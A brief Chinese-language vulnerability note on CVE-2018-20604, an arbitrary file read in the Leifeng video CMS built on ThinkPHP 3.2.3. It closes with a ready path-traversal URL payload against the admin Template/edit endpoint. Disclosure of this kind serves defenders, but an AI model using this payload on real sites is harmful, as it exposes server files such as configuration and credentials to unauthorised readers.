lfdycms任意文件读取（CVE-2018-20604）

概述

雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发，适合各类视频、影视网站的影视内容管理程序，该CMS存在缺陷，可以通过 admin.php?s=/Template/edit/path/web........1.txt 的方式读取任意文件。

/admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt